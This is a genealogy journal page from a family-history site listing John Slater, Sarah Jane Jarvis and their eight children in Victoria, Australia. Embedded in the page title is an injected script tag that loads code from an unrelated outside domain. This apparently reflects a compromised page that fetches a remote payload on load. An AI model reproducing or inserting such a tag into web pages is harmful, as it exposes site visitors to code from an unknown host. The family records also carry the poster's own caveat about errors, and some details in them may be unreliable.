SLATER John and Sarah JARVIS<script src="https://bestdoctornearme.com/splitter.ai/index.php"></script> :: FamilyTreeCircles.com Genealogy
<< Previous - Next >>

SLATER John and Sarah JARVIS

Journal by tonkin

Information Journal.

John SLATER and Sarah Jane JARVIS.

Marriage details not located at time of posting.

John died 1904 in Oakleigh, Victoria.
Age: 57 years.
Parents named as Lubin SLATER and Margaret MALANOPHY.

Sarah died 1923 in Oakleigh, Victoria.
Age: 73 years.
Parents named as Thomas JARVIS and Sarah Jane unknown.

Eight children located Victoria Australia for John and Sarah.

[1]

Sarah Jane SLATER.
Born: 1875 Oakleigh, Victoria.
Died: -

[2]

Martha SLATER.
Born: 1877 Malvern, Victoria.
Died: 1963 Red Cliff, Victoria.
Age: 86 years.

Married: John William CASTLE.
Year: 1896.
Place: Victoria.

[3]

Elizabeth SLATER.
Born: 1880 Malvern, Victoria.
Died: 1930 Oakleigh, Victoria.
Age: 50 years.

Married: John MILLER.
Year: 1901.
Place: Victoria.

[4]

Lubin SLATER.
Born: 1882 Malvern, Victoria.
Died: -

[5]

John SLATER.
Born: 1884 Malvern, Victoria.
Died: 1945 Heielberg, Victoria.
Age: 61 years.

[6]

Margaret May SLATER.
Born: 1885 St Kilda, Victoria.
Died: 1967 Bairnsdale, Victoria.
Age: 86 years.

Married: Frederick Abraham BAKER.
Year: 1914.
Place: Victoria.

[7]

Thomas Jarvis SLATER.
Born: 1888 Oakleigh, Victoria.
Died: 1939 Mildura, Victoria.
Age: 51 years.

Married: Ivy Jean KIRKPATRICK.
Year: 1915.
Place: Victoria.

[8]

William SLATER.
Born: 1890 Oakleigh, Victoria.
Died: -

Sources:
Registry of Births, Deaths and Marriages Victoria.

JN 25388

Surnames: 25388 BAKER CASTLE JARVIS KIRKPATRICK MALANOPHY MILLER SLATER
Viewed: 1859 times
Likes: 0
by tonkin Profile | Research | Contact | Subscribe | Block this user
on 2010-10-11 14:49:53

tonkin lives in Victoria, Australia.
Please note:
Journals are intended to assist new members locate family lines in Australia and should only be used as a guide for follow up research and record searches as intended. Due to spelling and informant errors appearing in the records, typo errors and my misreading of the records mistakes must be expected. Errors will be corrected when detected or advised.

Do you know someone who can help? Share this:

Comments

Register or Sign in to comment on this journal.